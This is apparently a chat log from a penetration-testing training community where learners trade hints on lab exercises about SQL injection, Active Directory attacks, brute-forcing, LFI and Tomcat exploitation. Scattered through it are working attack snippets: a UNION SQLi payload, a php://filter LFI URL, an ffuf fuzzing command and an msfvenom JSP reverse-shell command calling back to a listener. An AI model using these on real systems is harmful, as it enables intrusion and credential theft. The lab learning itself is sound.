I know a little bit about prototype pollution, but the rest seems interesting.. I'll go for whitebox for now
Hi! i'm on SQL injection module, in the exploitation part, can i know why, in the SQL statements, the course say to use cn ' ... <SNIP>, i don't understand specifically the cn string, is there a particular reason?
This is an example:
||cn' UNION select 1,database(),2,3-- -||
cn is just cause its a valid search query for that particular search functionality that youre injecting into
So it's not mandatory? Have not much experience with SQL injections but i've never seen it on a statement
cn isnt sql specific or anything
its just that for that injection youd like to have a valid result returned by the query
(you may be able to cut it entirely, idr)
cn is just a country name for that table, you could swap it for anything else in that page
ok ok makes sense, thanks for the explanation!
Can someone compare notes with me on AD Enum and Attacks skills assessment 2?
yeah
i had to reset the machine it work then
before it was giving the error
sure dm me
On the Cross Site Scripting, XSS Discovery has anyone got the answer to question 2 that is accepted?
Hello guys, been stuck for several hours on AD Enum & Attack Skills assessment Part 2 :
Question
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
I tried to catch MSSQLSVC hash via responder and xp_dirtree, but for every hash i got with that (||starting with SQL01$::INLANEFREIGHT:...|| i have hashcat which exhaust 😂
Is there someone who can hint me plz ?
hi guys!
Privileged Access module in Ad i cannot import to bloodhound
can someone help me how to do that? never used it before
what other things can you try with Mssql apart from catching the hash? 🤔
Command exec & impersonation
I tried command exec to get a revshell but found nothing so i tried to catch the hash with some hope x)
did you get the shell?
yes
then keep looking after, check your privileges
hm... gonna back on this shell... ty boyz !
i am starting neo4j database but nothing is inside
Look up a guide
i am running ./SharpHound Invoke-BloodHound - CollectionMethod All command but it does not find anything
You have to import the data after its collected
the neo4j db wont automagically know
usually collectors have an option to output to a zip file and then you can just import the zip file, its a bit easier that way
What host can this user access via WinRM? (just the computer name)
however i change the answer it does not accept
i ran the query from the example
only showed 1 result
what am i doing wrong?
i have found 5 hosts in the network no one is accepted as a good answer
have you tried stripping the domain name?
striping?
removing
Stripping
yes
Striping is a different word
ACADEMY-EA-DC01 i did like this, tried just DC01, EA-DC01
and with all the other hosts too
Make sure you have no spaces at the beginning and ending of your answer
my bad
which section again
ah yup. make sure you dont have extra spaces
one of those is 100% correct
Hi, about Skills Assessment - Service Login first question, I generated a usernames list and a passwords list according to the requirements, and the number of total ssh login tries is around 100,000, I am getting no hit and it could take forever.
Could I get a hint how to reduce the lists ? or how long it should take ?
check the hint
you should have no more than 15 users tho if you used username-anarchy
I used UsernameGenerator as required
Ok will try. I went with the requirement : "Also use 'usernameGenerator' to generate potential usernames for the employee. "
wth is usernameGenerator
I know, but why would they recommend it then ? it works ok
I mean if it works it works
yea xD you got no luck with it
you can brute force 100.000 tries with ssh
not feasible
cant**
yes you can
I need to install it
AH cool lets break the server then
it works when it doesnt murder the server lmao
the defaults are just really aggressive, can def tone it down
yes hydra tells you to adjust it
it also doesnt auto stop when it finds a success
its still 1000x faster than hydra
(and I dont think Im even being facetious)
anyways for that skill assessment you use username-anarchy and basic info about the user you find on google with cupp
it takes less than 1 minute to brute force it
Do you use -u to take less than 1 minute ?
obviously otherwise it tries all passwords for 1 user
and then go with the next user
with -u it tries all user with 1 password
great, it took a few seconds with -u ...
well next time use what you learned 😄
https://github.com/pwnesia/ssb this is the tool I was talking about ftr
thanks gonna be great to use it
-u just changes the order, you cannot know in advance if it will take less or more time
what order?
-u loops around users
instead of looping around passwords
yes you can infer that it will find the combination quicker if you loop around the shortest list
in this case the users one
you can make the maths behind my assertion
yeah on avg that will be shorter
unless the password list is weighted to the top with higher likelihoods
in which case shit gets funky
rockyou case iirc
https://academy.hackthebox.com/module/23/section/1492
The http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=config is not working
by using seclists directory 2.3 medium right ?
i think its a good list
in module its given directory 2.3 medium
🤷‍♂️
this ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
I dont remember needing to fuzz. it but you def can
hmm
the question itself asks you to fuzz it
mb then
im trying xd
just fuzz haha
why its fuzzing the file why not parameter
coz u want to read a .php file with a credential in it
but you dont know the name of the file
hm yeah
👌
you can fuzz the parameter if you want to
it doesnt make a huge difference
fuzzing parameter is theoretically even better because there could be files the LFI could read that the web server would deny access to directly.
those are shown if you use default ffuf config
yeah it doesnt matter
it prints 403 along with 200
302 in a file?
uh yeah
sure
i mean its supposed to be a config file
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
oh i dont have image perm
yeah i got it already i mean 302
Why are u always so mad f0x
anyways thanks everyone
sure, if thats how they implemented the blocking 😉 a 403 doesnt tell you if the file actually exists or just was blocked because of a forbidden path name or such
its my name cant you read
sure
Yes but have u tried a chill pill. It's blue
Have you tried a get good pill, its green
No i have been 1 year + as a skill issue learning basics still
I think any sane person would change hobbies
Btw u are in phone stuff do u install kali nethunter for ppl?
I have a tattoo
Id laugh them out of the store
Fox strikes madly again
Seek help incel
Stay on topic moron
Yoo
Fox u are savage
Yes please
Is it just me or can u connect to htb module instances without vpn connection?
Are u calling me a fool

U think I'm a no-good ignorant fool who can't use ifconfig command to see connections
yeah kinda

feels like you just want to banter in the modules chat instead of actually discuss modules
Can someone help me with the Mass IDOR Enumeration section in the Web Attacks Module? I am not getting the responses that are shown in the section.
Can someone help me with the Python3 “The first Iteration” question. I’m having difficulty finding out the answer
ask your question
hlo
What’s the best way to find the 3rd most used word for a target website?
hi im stuck in Attacking Common Applications - Skills Assessment I last question, can't type or cat on flag.txt, is there any command can i use to read the flag ?
I had issues too. My notes say that I moved the file to a different directory that let me use the vuln in question to read it directly.
oh finally i got it, thanks for the hint
np
I def feel theres probably a better way to finish it, but I didnt figure it out at the time
@hallow shale I'm not htb staff. Message website support my guy lol
I did it duh
Cool lol hope you get it resolved
nope, thats why i talked to you, i dint know
I tried the inet address with 'ens224' and it still would not listen. Then I tried the LPORT number 7800 instead of 4444 and it still did not establish a session:
msfvenom -p java/jsp_shell_reverse_tcp LHOST= 172.16.1.5 LPORT=7800 -f war > jenny.war
So I just retyped what I accidentally typed in erratum. The 'war' file is specified the used incorrect? I copied it as I had from the cheat sheet in the module
i purchased the subscription with my mobile phone and it worked, finally 😫
so what's the issue? you've got the .war file, you upload it and deploy it, set up the listener, open the file in the browser, but don't get a shell?
you have 2 different ways to exploit that host
maybe you can find the other one
😉
Nope
It does say I have two upload vulnerabilities
Do you see anything wrong with my command? I been executing the same command in the cheat sheet for a while now
Maybe don't have a space after LHOST=

